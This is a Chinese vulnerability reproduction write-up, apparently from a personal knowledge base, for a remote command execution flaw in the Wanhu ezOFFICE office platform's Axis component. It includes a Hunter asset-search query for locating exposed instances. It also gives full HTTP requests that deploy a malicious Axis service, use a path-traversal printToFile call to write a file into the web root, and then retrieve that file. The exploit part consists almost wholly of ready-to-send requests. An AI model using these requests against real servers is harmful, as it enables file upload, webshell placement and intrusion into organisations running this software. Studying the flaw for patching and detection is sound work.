登录 白背景
源码

万户协同办公平台 axis组件存在远程命令执行漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台 axis组件存在远程命令执行漏洞。

<font style="color:rgb(62, 62, 62);">二、影响版本</font>

  • <font style="color:rgb(62, 62, 62);">万户ezoffice</font>

<font style="color:rgb(62, 62, 62);">三、资产测绘</font>

  • <font style="color:rgb(62, 62, 62);">hunter</font><font style="color:rgb(62, 62, 62);">app.name="万户 Ezoffice OA"</font>
  • <font style="color:rgb(62, 62, 62);">登录页面</font>

1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png

<font style="color:rgb(62, 62, 62);">四、漏洞复现</font>

  1. 创建恶意类
GET /defaultroot/services/AdminService;1.js?method=%21--><deployment%20xmlns%3d"http%3a%2f%2fxml%2eapache%2eorg%2faxis%2fwsdd%2f"%20xmlns%3ajava%3d"http%3a%2f%2fxml%2eapache%2eorg%2faxis%2fwsdd%2fproviders%2fjava"><service%20name%3d"mcehcu3aytvh5xrpfqob"%20provider%3d"java%3aRPC"><parameter%20name%3d"className"%20value%3d"com%2ewhir%2eezoffice%2eezform%2eutil%2eStringUtil"%20%2f><parameter%20name%3d"allowedMethods"%20value%3d"%2a"%20%2f><%2fservice><%2fdeployment&charEncode=UTF-8 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Cache-Control: max-age=0
Connection: close

1710519995427-014209d0-1d64-44e7-b3f7-72c4c991182b.png

  1. 上传文件
POST /defaultroot/services/mcehcu3aytvh5xrpfqob;1.js HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Length: 732
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,fil;q=0.6
Cache-Control: no-cache
Connection: close
Content-Type: text/xml;charset=UTF-8
Cookie: OASESSIONID=A28E925D2984752792DD5511D9227F72
Pragma: no-cache
SOAPAction: ""

<soapenv:Envelope
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:util="http://com.whir.ezoffice.ezform.util.StringUtil"
    xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
    <soapenv:Header/>
    <soapenv:Body>
        <util:printToFile soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <fileName xsi:type="soapenc:string">../server/oa/deploy/defaultroot.war/public/upload/wrabnqgjdq.txt.</fileName>
            <content xsi:type="soapenc:string">ktmfq2qj6l3oisw92m9f</content>
        </util:printToFile>
    </soapenv:Body>
</soapenv:Envelope>

1710520040166-bc47ce98-2ce0-4d72-8622-8b71e2bfb3f6.png

  1. 文件上传地址
GET /defaultroot/public/upload/wrabnqgjdq.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_7_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept-Language: en
Connection: close
Cookie: OASESSIONID=A28E925D2984752792DD5511D9227F72
Accept-Encoding: gzip, deflate

1710520064630-dc683a43-fec1-4971-ac09-3cfdb126cc35.png

wanhu-axis-fileupload.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/rlbhh7h3l4xwg317